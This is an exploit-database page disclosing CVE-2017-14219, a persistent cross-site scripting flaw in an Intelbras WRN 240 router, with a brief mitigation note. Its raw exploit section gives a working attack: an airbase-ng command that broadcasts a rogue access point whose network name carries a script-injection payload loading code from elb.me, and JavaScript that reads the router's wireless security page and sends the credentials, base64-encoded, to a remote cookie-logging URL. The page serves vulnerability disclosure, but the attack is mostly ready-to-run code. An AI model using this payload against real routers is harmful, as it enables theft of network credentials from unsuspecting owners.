header-logo
Suggest Exploit
vendor:
Intelbras Wireless N 150Mbps
by:
Elber Tavares
6.1
CVSS
MEDIUM
XSS
79
CWE
Product Name: Intelbras Wireless N 150Mbps
Affected Version From: Intelbras Wireless N 150Mbps - WRN 240
Affected Version To: Not specified
Patch Exists: NO
Related CWE: CVE-2017-14219
CPE: h:intelbras:intelbras_wireless_n_150mbps:wrn_240
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux, Windows 7, 8.1, 10
2017

XSS persistent on intelbras router with firmware WRN 250

This exploit allows for persistent XSS on intelbras routers with firmware WRN 250. The vulnerability can be exploited by injecting a malicious script through the URL http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm. The payload used in the exploit is </script><script src='//elb.me'>. This exploit requires the presence of a PHP script to retrieve the logs.

Mitigation:

To mitigate this vulnerability, it is recommended to update the firmware of the Intelbras router to a version that includes a fix for this issue. Additionally, network administrators can implement input validation and output encoding to prevent XSS attacks.
Source

Exploit-DB raw data:

# Exploit Title: XSS persistent on intelbras router with firmware WRN 250
# Date: 07/09/2017
# Exploit Author: Elber Tavares
# Vendor Homepage: http://intelbras.com.br/
# Version: Intelbras Wireless N 150Mbps - WRN 240
# Tested on: kali linux, windows 7, 8.1, 10

# CVE-2017-14219

For more info:


http://whiteboyz.xyz/xss-roteador-intelbras-wrn-240html

URL VULN: http://10.0.0.1/userRpm/popupSiteSurveyRpm.htm

Payload: </script><script src='//elb.me'>

"elb.me contains the malicious code on index"

airbase-ng -e "</script><script src='//elb.me'>" -c 8 -v wlan0mon

//requires an php script to get the logs

PoC:

var rawFile = new XMLHttpRequest();
rawFile.onreadystatechange = function() {
       alert(rawFile.responseText);
       var base64 = rawFile.responseText.split('>')[1].split("/SCRIPT")[0];
       //seleiciona a parte da página com as credenciais
       new Image().src="https://elb.me/cookie.php?ck="+btoa(base64);
       //envia as credenciais encodadas em base64
};
rawFile.open("GET", "http://10.0.0.1/userRpm/WlanSecurityRpm.htm", true);
//pega a source da página /popupSiteSurveyRpm.htm
rawFile.send();